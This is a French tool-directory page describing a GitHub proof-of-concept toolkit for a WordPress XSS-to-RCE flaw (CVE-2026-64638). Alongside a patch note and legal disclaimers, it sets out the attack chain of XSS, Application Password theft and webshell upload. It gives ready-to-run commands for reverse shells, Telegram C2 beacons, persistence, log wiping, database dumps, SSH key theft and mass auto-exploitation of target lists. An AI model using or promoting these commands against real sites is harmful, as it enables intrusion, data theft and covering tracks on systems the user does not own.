Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-64638-PoC-Exploit — 🛡️ CVE-2026-64638 - Suite d'évaluation de sécurité WordPress (CVSS 8.9) | Boîte à outils de pentest WordPress 4.7.0-7.0.2. Comprend des modules d'évaluation des vulnérabilités et d'analyse avancée. 🐍 Vérification sûre et exploitation, 2 modes. Boîte à outils avancée Blue&Red Team Best 2026-64638, utilisation autorisée uniquement. Restez légal <3zd | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-64638-poc-exploit
Escalade de PrivilègesScanners de VulnérabilitésCriminalistique MémoireMécanismes de PersistanceExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionCommandement et Contrôle

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

🛡️ CVE-2026-64638 - Suite d'évaluation de sécurité WordPress (CVSS 8.9) | Boîte à outils de pentest WordPress 4.7.0-7.0.2. Comprend des modules d'évaluation des vulnérabilités et d'analyse avancée. 🐍 Vérification sûre et exploitation, 2 modes. Boîte à outils avancée Blue&Red Team Best 2026-64638, utilisation autorisée uniquement. Restez légal <3zd

GitHubtc4dy/cve-2026-64638-poc-exploit

CVE-2026-64638-PoC-Exploit

Voir le dépôt
18il y a 1 moisPas encore vérifié
Partager

CVE PoC

🌀 CVE‑2026‑64638 – Suite de sécurité WordPress XSS2Shell

Python 3.8+ CVSS Author WordPress

⚠️ UTILISATION ÉTHIQUE UNIQUEMENT – TESTS DE SÉCURITÉ AUTORISÉS
Ce dépôt fournit des outils destinés uniquement aux professionnels de la sécurité autorisés, aux blue teams et aux testeurs d'intrusion.
L'accès non autorisé à des systèmes informatiques est illégal en vertu du CFAA (États-Unis), du Computer Misuse Act (Royaume-Uni), du TCK 243/244 (Turquie) et des lois similaires dans le monde entier.


📖 Aperçu de la vulnérabilité

CVE‑2026‑64638 est une vulnérabilité critique de type XSS réfléchie pré‑authentification dans le cœur de WordPress, versions 4.7.0 à 7.0.2, qui permet à un attaquant d'élever une attaque XSS en exécution de code à distance (RCE) complète via la fonctionnalité Application Password (mot de passe d'application).

Comment cela fonctionne

  1. Différentiel d'analyse syntaxique – la fonction strip_tags() de PHP et wp_kses_post() de WordPress analysent les balises HTML différemment, ce qui permet à une entrée malveillante de contourner l'assainissement.
  2. XSS réfléchie – un attaquant injecte une charge utile spécialement conçue dans le formulaire de connexion (wp-login.php). En cas d'échec de connexion, la charge utile est réfléchie et exécutée dans le navigateur de la victime.
  3. Abus de l'Application Password – le JavaScript injecté génère automatiquement un mot de passe d'application via l'API REST de WordPress et l'exfiltre vers l'attaquant.
  4. Téléversement de plugin (RCE) – à l'aide du mot de passe d'application capturé, l'attaquant s'authentifie sur le panneau d'administration et téléverse un plugin malveillant contenant une webshell.
  5. Compromission totale du système – la webshell permet l'exécution de commandes système, autorisant des shells inversés, la persistance, les déplacements latéraux et la prise de contrôle complète du serveur.

Versions concernées

  • WordPress 4.7.0 – 7.0.2 – vulnérable
  • WordPress 7.0.3 et versions ultérieures – corrigé
  • Les mises à jour de sécurité ont été rétroportées vers toutes les branches maintenues

Correctif

  • Mettez à niveau vers WordPress 7.0.3 ou une version plus récente.
  • Si la mise à niveau n'est pas possible, désactivez la fonctionnalité Application Password comme mesure de contournement temporaire.

🧰 Outils

OutilObjectifUtilisateur visé
exploit.pyBoîte à outils d'exploitation complète avec shell inversé, persistance, C2, élévation de privilèges, forensic mémoire, dump de base de données, extraction de clés SSH et scan de masse.

📊 Comparaison des fonctionnalités


🎯 Résumé des cas d'utilisation


⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]

📋 Paramètres

Paramètres de exploit.py

Paramètres de safecheck.py


💥 Scénarios


📊 Commandes du shell interactif


🧪 Utilisation des points d'accès et de l'API

Point d'accèsObjectif
/wp-login.phpPage de connexion – point d'injection XSS

🛡️ Utilisation responsable

  • N'utilisez ces outils que sur des systèmes dont vous êtes propriétaire ou pour lesquels vous disposez d'une autorisation écrite explicite de test.
  • L'accès non autorisé est illégal et contraire à l'éthique.
  • Les auteurs ne sont pas responsables de toute utilisation abusive.
  • Respectez toujours les lois et règlements de votre pays.

Ce logiciel est fourni uniquement à des fins éducatives et pour des tests de sécurité autorisés.

Conformité légale

Télécharger l’outil
Red teams / pentesters autorisés
safecheck.pyVérificateur de vulnérabilité non intrusif qui détecte la réflexion XSS et évalue la posture de sécurité sans exécuter de charge utile malveillante. Génère des rapports détaillés.Blue teams / auditeurs de sécurité
Fonctionnalitéexploit.pysafecheck.py
Détection de vulnérabilité✅✅
Détection de version WordPress✅✅
Détection de réflexion XSS✅✅
Capture d'Application Password✅❌
Téléversement de plugin (RCE)✅❌
Shell inversé✅❌
Balise C2 (HTTP/DNS/Telegram)✅❌
Élévation de privilèges✅❌
Forensic mémoire✅❌
Dump de base de données✅❌
Extraction de clés SSH✅❌
Méthodes de persistance✅❌
Audit des en-têtes de sécurité❌✅
Vérification d'exposition des fichiers de configuration❌✅
Vérification du listage des répertoires❌✅
Vérification d'exposition de phpinfo❌✅
Scan de masse✅✅
Prise en charge des proxys✅✅
Prise en charge de Tor✅✅
Tunnel Ngrok✅❌
Shell interactif✅❌
Mode non intrusif (sûr)❌✅
Sortie JSON / rapport✅✅
ScénarioOutil recommandé
Blue Team – vérifier si votre installation WordPress est vulnérablesafecheck.py
Audit de sécurité – évaluation de vulnérabilité non intrusivesafecheck.py
Red Team – tests d'intrusion autorisés avec exploitation complèteexploit.py
Bug Bounty – tests de divulgation responsablesafecheck.py
Scan de masse – vérification de plusieurs cibles pour une vulnérabilitéexploit.py ou safecheck.py
Réponse aux incidents – vérifier si des systèmes sont compromissafecheck.py
Post‑exploitation avancée – persistance, C2, forensiqueexploit.py
ParamètreDescription
-t, --targetURL WordPress cible (par ex. https://wordpress-site.com)
-l, --listFichier contenant une liste de cibles (une par ligne) pour le scan de masse
--lhostAdresse IP locale pour les rappels de shell inversé
--lportPort local pour le shell inversé (défaut : 4444)
--proxyProxy HTTP/HTTPS (par ex. http://127.0.0.1:8080)
--timeoutDélai d'expiration des requêtes en secondes (défaut : 10)
--retryNombre de nouvelles tentatives (défaut : 3)
--threadsNombre de threads pour le scan de masse (défaut : 5)
--exploitExploiter automatiquement les cibles vulnérables pendant le scan de masse
--ngrok-tokenJeton d'authentification Ngrok pour le tunneling externe
--payload-typeType de charge utile XSS : reflected, dom_based, waf_bypass, case_manipulation, double_encoded
--session-hijackActiver le détournement de session (vol des cookies administrateur)
--dump-dbDumper la base de données WordPress (nécessite pymysql)
--extract-sshExtraire les clés SSH du système cible
--torAcheminer le trafic via Tor (socks5h://127.0.0.1:9050)
--stealthActiver le mode furtif (en-têtes falsifiés, requêtes retardées)
--no-cleanupIgnorer le nettoyage des journaux après l'exploitation
--ssl-verifyVérifier les certificats SSL
--c2-typeType de C2 : http, dns, telegram
--c2-serverURL du serveur C2 ou jeton de bot Telegram
--auto-priv-escÉlévation de privilèges automatique après le shell
--memory-forensicsActiver le module de forensic mémoire
-v, --verboseSortie détaillée
-q, --quietMode silencieux (sortie minimale)
ParamètreDescription
-t, --targetURL WordPress cible (par ex. https://wordpress-site.com)
-l, --listFichier contenant une liste de cibles (une par ligne) pour le scan de masse
--timeoutDélai d'expiration des requêtes en secondes (défaut : 10)
--retryNombre de nouvelles tentatives (défaut : 3)
--threadsNombre de threads pour le scan de masse (défaut : 5)
--proxyProxy HTTP/HTTPS (par ex. http://127.0.0.1:8080)
--torAcheminer le trafic via Tor (socks5h://127.0.0.1:9050)
--ssl-verifyVérifier les certificats SSL
--outputFichier de rapport JSON de sortie
-v, --verboseSortie détaillée
-q, --quietMode silencieux (sortie minimale)
#ScénarioCommande
1Vérification rapide de vulnérabilitépython safecheck.py -t https://wordpress-site.com
2Scan détaillé avec rapportpython safecheck.py -t https://wordpress-site.com --output report.json -v
3Exploitation complète avec shell inversépython exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit
4Utiliser une charge utile XSS personnaliséepython exploit.py -t https://wordpress-site.com --payload-type waf_bypass
5Détournement de session (vol des cookies administrateur)python exploit.py -t https://wordpress-site.com --session-hijack
6Dumper la base de données WordPresspython exploit.py -t https://wordpress-site.com --dump-db
7Extraire les clés SSHpython exploit.py -t https://wordpress-site.com --extract-ssh
8Utiliser Tor pour l'anonymatpython exploit.py -t https://wordpress-site.com --tor --stealth
9Balise C2 avec Telegrampython exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id"
10Scan de masse à partir d'un fichierpython exploit.py -l targets.txt --threads 10 --exploit
11Forensic mémoire après le shellpython exploit.py -t https://wordpress-site.com --memory-forensics
12Élévation de privilèges automatiquepython exploit.py -t https://wordpress-site.com --auto-priv-esc
13Shell interactifpython exploit.py -t https://wordpress-site.com -i
14Tunnel Ngrokpython exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN
CommandeDescription
reverseDémarrer l'écouteur de shell inversé
persistAppliquer les méthodes de persistance (cron, systemd, rc.local, SSH, WP)
cleanNettoyer les journaux système et l'historique
dumpdbDumper la base de données WordPress
sshExtraire les clés SSH
privÉlévation de privilèges automatique
memExécuter le forensic mémoire
c2Afficher l'état du C2
c2taskVérifier les tâches C2
exitQuitter le shell interactif
/wp-admin/authorize-application.php
Génération d'Application Password
/wp-admin/update.php?action=upload-pluginTéléversement de plugin (RCE)
/wp-content/plugins/{slug}/{slug}.phpExécution de la webshell
PaysLoi applicable
États-UnisComputer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030
Royaume-UniComputer Misuse Act 1990
TurquieTCK 243 (Accès non autorisé), TCK 244 (Interférence avec un système)
AllemagneStGB § 202a (Espionnage de données), § 202b (Interception de données)
FranceLoi Godfrain – Article 323-1
AustralieCybercrime Act 2001
CanadaCode criminel – Article 342.1
IndeInformation Technology Act 2000 – Articles 43, 66
JaponAct on Prohibition of Unauthorized Computer Access